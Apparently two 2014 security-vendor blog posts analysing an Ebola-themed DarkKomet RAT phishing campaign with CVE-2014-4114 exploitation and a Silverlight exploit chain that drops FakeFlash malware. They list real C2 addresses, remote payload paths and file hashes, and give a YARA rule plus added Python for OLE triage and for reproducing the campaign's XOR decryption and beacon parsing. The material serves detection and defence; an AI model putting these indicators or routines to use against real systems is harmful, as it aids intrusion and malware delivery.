Ebola Spreads - In Cyber Attacks Too
Posted by uwang on 23 October 2014 12:08 PM

The Ebola virus has been spreading in West Africa since it first appeared in Guinea in December 2013. Its rising rate of infection, high mortality rate, and challenging isolation and containment requirements have raised worldwide alarm.

Against that backdrop, Websense® Security Labs has found two distinct malicious campaigns that exploit the Ebola topic, and it is probably safe to assume that the topic will continue to be abused in the future.

DarkKomet RAT/Backdoor Campaign

Beginning October 10, 2014, the Websense® ThreatSeeker® Intelligence Cloud has detected thousands of malicious emails taking advantage of the Ebola topic. The subject line is:

  • Subject: Ebola Safety Tips-By WHO

At the beginning of the campaign, the messages contained a redirect URL that led victims to a download location for a RAR archive. The archive contained the DarkKomet RAT/Backdoor. DarkKomet is a Remote Administration Tool (RAT) that provides full access to remote clients. It is used by attackers to control the victim's computer and steal information. In more recent emails, the campaign evolved to include direct attachment of executables, and then to direct attachment of a RAR archive containing the executable. The sample below shows the RAR attachment variant.




The malware in this campaign contacted a server located in Romania: 5.254.112.46:1604

ThreatScope has identified the malware samples as malicious. Here are two file variants from the campaign, each with a ThreatScope analysis report:

  • SHA1: e2bdede8375da63998562f55a77d4b078d3b5646
  • SHA1: 91ff874eb5bde1bb6703e01d7603d3126ddd01fc

CVE-2014-4114 & CVE-2014-6352 - Windows OLE Remote Code Execution Vulnerabilities


On October 14, 2014, iSIGHT discovered vulnerability CVE-2014-4114, used in the Sandworm campaign that targeted NATO, the European Union, and members of the telecommunications and energy sectors. CVE-2014-4114 can allow remote code execution if a user opens a specially crafted Microsoft Office file containing an OLE object. The vulnerability affects all supported releases of Microsoft Windows except Windows Server 2003. Because the vulnerability does not involve memory corruption that results in shellcode, and because it falls in the category of 'design error', protection methods like DEP and ASLR are not effective against it. Example exploit code for CVE-2014-4114 has been spotted posted on the web, and criminal actors could use it to build a malicious PowerPoint file to spread malware. Shortly after the disclosure of CVE-2014-4114, a very similar vulnerability that also involves OLE objects surfaced and is tracked as CVE-2014-6352. While CVE-2014-4114 has been patched by Microsoft, CVE-2014-6352 still awaits a patch.

Websense® Security Labs has noticed that the Ebola topic has also been abused in relation to CVE-2014-4114. A sample from a third-party source, named "Ebola in American.pps", leveraged CVE-2014-4114 to download and execute a payload from a remote address over the SMB protocol, even though outbound SMB to public Internet addresses is usually not allowed:

  • \\220.135.249.228\public\install.inf
  • \\220.135.249.228\public\word.exe

Documents that attempt to exploit CVE-2014-6352 can be detected with YARA. The rule below can be run against Microsoft Office files to surface such documents; it could use a bit of tweaking and expanding to also cover the INF variant:

rule cve_2014_6352
{
    strings:
        $rootentry = {52 00 6F 00 6F 00 74 00 20 00 45 00 6E 00 74 00 72 00 79 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 16 00 05 00 ff ff ff ff ff ff ff ff 01 00 00 00}
        $ole10native = {4F 00 ( 4C | 6C ) 00 ( 45 | 65 ) 00 31 00 30 00 4E 00 61 00 74 00 69 00 76 00 65 00 00}
        $c = "This program cannot be run in DOS mode"
    condition:
        ($rootentry or $ole10native) and $c
}
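As an added example (not Websense's rule or code), the Python below mirrors the rule's byte patterns so a file can be triaged outside YARA and sketches the INF extension the text calls for. The UNC-path check, the HOST_PLACEHOLDER host and the sample blobs are assumptions and constructed data, not taken from the page.

```python
import re
from typing import Dict, List

# Byte patterns mirrored from the YARA rule above: OLE directory entry names are
# UTF-16LE, the PE DOS stub message is ASCII. The rule anchors on the whole
# "Root Entry" directory record; matching the name alone is a looser approximation.
ROOT_ENTRY = "Root Entry".encode("utf-16-le")
OLE10NATIVE_RE = re.compile(
    rb"O\x00[Ll]\x00[Ee]\x00" + "10Native".encode("utf-16-le") + b"\x00")
DOS_STUB = b"This program cannot be run in DOS mode"
# Assumed INF extension (not on the page): an OLE container that carries a UNC
# path such as \\host\share\install.inf, stored either as ASCII or as UTF-16LE.
UNC_RE = re.compile(r'\\\\[0-9A-Za-z._\-]+(?:\\[^\\\s\x00"<>|]+)+')


def unc_paths(data: bytes) -> List[str]:
    """Return every UNC path found as ASCII or as UTF-16LE at either byte alignment."""
    found = {m.group(0) for m in UNC_RE.finditer(data.decode("latin-1"))}
    for offset in (0, 1):
        text = data[offset:].decode("utf-16-le", errors="ignore")
        found.update(m.group(0) for m in UNC_RE.finditer(text))
    return sorted(found)


def scan_ole_object(data: bytes) -> Dict[str, object]:
    """Evaluate the rule's strings plus the UNC check and explain the verdict."""
    has_container = ROOT_ENTRY in data or OLE10NATIVE_RE.search(data) is not None
    has_pe = DOS_STUB in data
    paths = unc_paths(data)
    return {
        "ole_container": has_container,
        "embedded_pe": has_pe,
        "unc_paths": paths,
        "yara_match": has_container and has_pe,        # same condition as the rule
        "inf_suspect": has_container and bool(paths),  # assumed INF extension
    }


# Constructed test data (not real samples): a fake OLE object wrapping a PE stub,
# and one wrapping an INF that references a share on a placeholder host.
SAMPLE_PE = (b"junk" + ROOT_ENTRY + b"\x00" * 8 + "Ole10Native".encode("utf-16-le")
             + b"\x00\x00MZ" + DOS_STUB + b"\x00")
SAMPLE_INF = (b"junk" + "OLE10Native".encode("utf-16-le") + b"\x00\x00"
              + ('[Version]\r\nSignature="$CHICAGO$"\r\n[DefaultInstall]\r\n'
                 'CopyFiles=\\\\HOST_PLACEHOLDER\\public\\word.exe\r\n').encode("utf-16-le"))

if __name__ == "__main__":
    for name, blob in (("pe", SAMPLE_PE), ("inf", SAMPLE_INF)):
        print(name, scan_ole_object(blob))
```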

Websense customers are protected against this threat with ACE, our Advanced Classification Engine, at the stages of the attack detailed below:

  • Stage 2 (Lure) – ACE protects against the lure email messages and URLs that carry the threat.
  • Stage 4 (Exploit) – ACE has real-time detection for the exploit code that attempts to deliver the threat.
  • Stage 5 (Dropper) – ACE has detection for the malicious files delivered by this threat.
  • Stage 6 (Call Home) – ACE detects communication to the C&C points associated with this threat.

Blog contributors: Ulysses Wang, Ran Mosessco, Nicholas Griffin.

FakeFlash Installation via Silverlight
Posted by Jose Barajas on 14 February 2014 05:15 PM

Using the Websense® ThreatSeeker® Intelligence Cloud, Websense Security Labs researchers have discovered attempts to infect users through the widely distributed Silverlight plug-in. Silverlight allows development of web and mobile applications featuring streaming media, multimedia, graphics, and animation. It has been used for video streaming of events such as the 2008 Summer Olympics in Beijing, the 2010 Winter Olympics in Vancouver, and the 2008 conventions of both major United States political parties. Streaming services such as Netflix use Silverlight for Digital Rights Management (DRM). By leveraging two Silverlight plug-in vulnerabilities, CVE-2013-3896 and CVE-2013-0074, attackers have been able to infect victims with dropper files and subsequently have the infected machines call home to the command and control (C&C) server.

We will analyze this malicious campaign and explain how it goes from generating the first dropper file to calling home for additional binaries. The infection begins with the following:

1. Silverlight object with "param" value
The infected URL hxxp://philelec.be/VZX.html hosts code that loads Java and Silverlight content, passing a parameter value to the Silverlight object. The Silverlight file exploits CVE-2013-3896 and CVE-2013-0074. Once arbitrary code execution is obtained, the param value is read and executed.



2. Base64 encoded Visual Basic Script
The param value loaded with the plug-in is a Base64 encoded Visual Basic Script (VBS). Silverlight generates the VBS file and places it in the directory C:\Users\<user name>\AppData\Local\Temp\Log. Please note the following code:



The downloaded binary is encrypted with the XOR key “m3S4V”. Using ADODB.Stream, which can read and write text and binary files, the script writes the decrypted binary to a file named 4bb213.exe and runs it.

3. Call home for dropper file
Upon execution, the file makes two calls to the bot network server hxxp://cc9966.com/. The queries included in the call contain the version of Windows running on the infected machine. In our ACE Insight report, the query os=5.1.2600_2.0_32 tells the server that the system is Windows XP 32-bit. Once the OS version is known, a dropper file is downloaded from hxxp://cc9966.com/clk.



4. Additional dropper downloads
Additional binaries are then downloaded from the URL hxxp://net-translscl.com/b/shoe/456.




http://csi.websense.com/ThreatScope/FileAnalysis?requestId=35f12d05-ddc1-4cb5-a104-a2cb00b84a53
http://csi.websense.com/ThreatScope/FileAnalysis?requestId=15e9c86c-fee4-4962-a906-a2cb00b844d9

5. FakeFlash update installation
Lastly, a FakeFlash update file is installed. Once that is complete, one last file is run.



The Windows batch file makes final changes and restarts the user machine.
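The decryption and call-home steps above, as an added example that is not the campaign's VBS or any Websense code: repeating-key XOR with the key quoted in step 2, a header sanity check on the result, and a parser for the os= beacon field from step 3. The C2_PLACEHOLDER host, the constructed payload and the WINDOWS_VERSIONS lookup are assumptions; the page confirms only that 5.1.2600_2.0_32 means Windows XP 32-bit.

```python
from urllib.parse import parse_qs, urlparse

XOR_KEY = b"m3S4V"  # the key quoted on this page for the downloaded binary
DOS_STUB = b"This program cannot be run in DOS mode"


def xor_repeating(data: bytes, key: bytes = XOR_KEY) -> bytes:
    """Repeating-key XOR as used by the VBS stage; symmetric, so it also decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def looks_like_pe(data: bytes) -> bool:
    """Sanity check after decryption: a DOS header plus the usual stub message."""
    return data[:2] == b"MZ" and DOS_STUB in data[:512]


# Assumed lookup for the major.minor prefix of the os= field; the page only
# confirms that 5.1.2600 is Windows XP.
WINDOWS_VERSIONS = {"5.1": "Windows XP", "6.0": "Windows Vista", "6.1": "Windows 7",
                    "6.2": "Windows 8", "6.3": "Windows 8.1"}


def parse_beacon(url: str) -> dict:
    """Decode the os= query parameter, e.g. os=5.1.2600_2.0_32 -> Windows XP, 32-bit.

    The middle field ("2.0") is not explained on the page, so it is returned as-is.
    """
    os_field = parse_qs(urlparse(url).query).get("os", [""])[0]
    parts = os_field.split("_")
    version = parts[0]
    major_minor = ".".join(version.split(".")[:2])
    return {
        "version": version,
        "product": WINDOWS_VERSIONS.get(major_minor, "unknown"),
        "middle": parts[1] if len(parts) > 1 else "",
        "bits": parts[-1] if len(parts) > 2 else "",
    }


# Constructed stand-in for the downloaded blob: a minimal DOS-header-like payload
# encrypted with the campaign key, so the decryption path can be exercised offline.
FAKE_PE = b"MZ" + b"\x90" * 60 + DOS_STUB + b"\x00" * 16
ENCRYPTED_BLOB = xor_repeating(FAKE_PE)
BEACON_URL = "http://C2_PLACEHOLDER/?os=5.1.2600_2.0_32"  # host is a placeholder

if __name__ == "__main__":
    print(looks_like_pe(xor_repeating(ENCRYPTED_BLOB)), parse_beacon(BEACON_URL))
```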



At the time of initial investigation, fewer than 10% of AV vendors had detection for the malicious files. The dropper files involved in this campaign are currently being identified as a Trojan threat by AV vendors. Based on call back activity, infected machines may be updated with additional dropper files by the C&C server when communication is established.

The C&C server hosting the dropper file was registered via a domain privacy provider, while the resolving IP address is owned by the hosting provider 3NT Solutions. Communication attempts to the C&C server have been observed from the following countries:



While Silverlight is not commonly used for business purposes, its use for web applications and streaming gives it a strong presence on devices owned by everyday users. With many companies embracing BYOD policies, applications such as Silverlight provide malicious actors with another potential cyber-attack vector.

Websense customers are protected with ACE™, our Advanced Classification Engine, at the stages detailed below:

  • Stage 3 (Exploit Kit) – ACE has detection for the malicious code which attempts to execute this cyber-attack.
  • Stage 5 (Dropper Files) – ACE has detection for the binary files associated with this attack. Additionally, ThreatScope behavioral analysis classifies the binary's behavior as malicious or suspicious.
  • Stage 6 (Call Home) – Communication to the associated C&C server is prevented.
